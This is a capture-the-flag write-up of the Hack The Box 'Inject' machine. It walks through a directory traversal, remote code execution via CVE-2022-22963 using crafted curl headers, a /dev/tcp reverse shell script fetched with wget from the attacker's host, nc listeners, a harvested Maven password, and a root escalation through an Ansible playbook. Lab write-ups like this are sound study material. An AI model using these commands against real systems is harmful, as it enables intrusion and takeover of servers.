Inject @ Hack The Box

Inject was a Linux box set up by rajHere at Hack the Box. This machine was easy in terms of difficulty, and worth 20 points.

Reconnaissance

Enumeration

I started with the recon for the initial information gathering, and scanned the machine (10.10.11.204) using nmap.

┌──(kali㉿blackbox)-[~/Documents/HTB/Boxes/Inject]
└─$ nmap -A 10.10.11.204
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 00:12 IST
Nmap scan report for 10.10.11.204
Host is up (0.24s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
1077/tcp filtered imgames
8080/tcp open     nagios-nsca Nagios NSCA
|_http-title: Home
|_http-open-proxy: Proxy might be redirecting requests
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.56 seconds

Finding open http service, it’s the time to browse, and view the site.

Foothold

We can find an upload link in the top right corner that might enable us to upload something to the server. After going to the link, we tried to upload an image. The image got uploaded, and now we had an option to view the image.

I tried viewing the image uploaded to the server.

I also intercepted the image-view request using burpsuit and found following:

It guided me to give an attempt to the directory traversal, and check for the possibility of existing vulnerability.

It resulted back in the complete list of differnet accounts existing on the machine. I found that 3 of the response accounts to be very helpful including the root. The complete response is given below:

HTTP/1.1 200 
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 1986
Date: Fri, 12 May 2023 17:54:55 GMT
Connection: close

root❌0:0:root:/root:/bin/bash
.
.
frank❌1000:1000:frank:/home/frank:/bin/bash
.
.
phil❌1001:1001::/home/phil:/bin/bash
fwupd-refresh❌112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel❌997:996::/var/log/laurel:/bin/false

Lateral Movement

Checking the contents of these users, we came across the home directory of user Phil. Looking up the content of user ‘phil’s’ home directory gives the location of user flag user.txt.

As per the namp, we earlier found 2 of the services running on Inject:

1077/tcp filtered imgames
8080/tcp open     nagios-nsca Nagios NSCA

I searched for any possible vulnerability to pwn the user phil. At last, I came across the “CVE-2022-22963”, due to which, it is possible to provide a specially crafted SpEL as a routing-expression and perform remote code execution (RCE). Well, this could let us run any shell script on the machine. I tried opening a python server exploit the vulnerability.

┌──(kali㉿blackbox)-[~/…/HTB/Boxes/Inject/guide]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("pyhton3 -m http.server 9999")' --data-raw 'data' -v

As an attempt, I successfully started the http server on port 9999 using the liberty RCE. Visiting the URL http://10.10.11.204:9999 brought me to the following screen:

Privilege Escalation

I decided to upload a reverse shell script somewhere in /tmp/ and run the same using terminal command to esclate the user previlege. Hence, I created a new directory by passing the command mkdir /tmp/hackStuff. The POC for the newly created directory is given below.

It was the time to upload the a script for getting the reverse shell. I created the following file named rev.sh and saved in directory ./src/ in my current host machine.

#!/bin/bash
bash -i >& /dev/tcp/10.10.xx.xx/4444 0>&1

Before uploading to the Inject machine, the rev.sh was made executable by running chmod +x rev.sh. In order to upload the file to the vulnerable machine, I started a python server on my current machine, i.e., host.

┌──(kali㉿blackbox)-[~/…/Boxes/Inject/guide/src]
└─$ sudo python -m http.server 7777
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...

Following the starting of the server, I used wget to upload the rev.sh using the following curl request.

┌──(kali㉿blackbox)-[~/…/HTB/Boxes/Inject/guide]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.10.xx.xx:7777/src/rev.sh -O /tmp/hackStuff/rev.sh")' --data-raw 'data' -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.88.1
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.10.xx.xx:7777/src/rev.sh -o /tmp/hackStuff/rev.sh")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Sun, 14 May 2023 16:38:06 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-05-14T16:38:06.157+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}

As it can be seen below, the file upload was successful.

Now, I started listening on port 4444 as we could expect the rever shell on running the recently uploaded script rev.sh.

┌──(kali㉿blackbox)-[~/…/Boxes/Inject/guide/src]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

I simply ran the rev.sh leveraging the vulnerability to gain the reverse shell. On executing the script, I got the access to the account ‘frank’.

Gaining User (phil)

We already knew that the user flag is located in the phil’s home directory. Hence we tried browsing through server. However, the current permissions needed to be more sufficient to provide us with the flag by viewing its content.

Checking the contents of frank’s home directory, I found an unusual hidden directory .m2. It lead me to explore this directory and the only file present in it - settings.xml. This file consisted the password of user phil. I browsed this file at http://10.10.11.204:9999/home/frank/.m2/settings.xml.

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>ThePassword</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

An alternative way to view this file could be going into .m2 directory and running:

frank@inject:~/.m2$ cat settings.xml

It was a turning point as we extracted the user flag, i.e., user.txt by running following one command after logging in the phil's account, as it was present in the user’s home directory.

$ cat ~/user.txt

It resulted into user flag: 4f8b2c😈😈😈😈😈😈😈c10753

Gaining root

As the first step towards, I tried checking for the files loaded by root proceses from traversing the dir /opt/automation/tasks by browsing the file location (as we already have the python server running).

The root seemed to automatically execute the task specified in playbook_1.yml. With such information, I decided to create a new shell script in the victim machine which could be later run by a custom .yml file.

I ran echo <reverse shell payload> >> /tmp/root.sh through the curent user’s terminal. The came could be found through the brower, as well.

Now, next step was to execute the root.sh by making root to load a custom .yml file. I wrote the following explot.yml to upload in the /opt/automation/tasks directory.

- hosts: localhost
  tasks:
  - name: RevSh
    command: bash /tmp/root.sh

Before starting to upload the file by opening server on host and running wget through victim, I started listening on port 3434.

$ nc -lvnp 3434

Now, I served the file through port 6868 of the host machine and downloaded it on victim machine.

As expected, soon the file was downloaded, the root user loaded exploit.yml that evantually ran the reverse shell script root.sh giving me the reverse shell.

We could find the root flag root.txt in the home directory, i.e., ~/root.txt.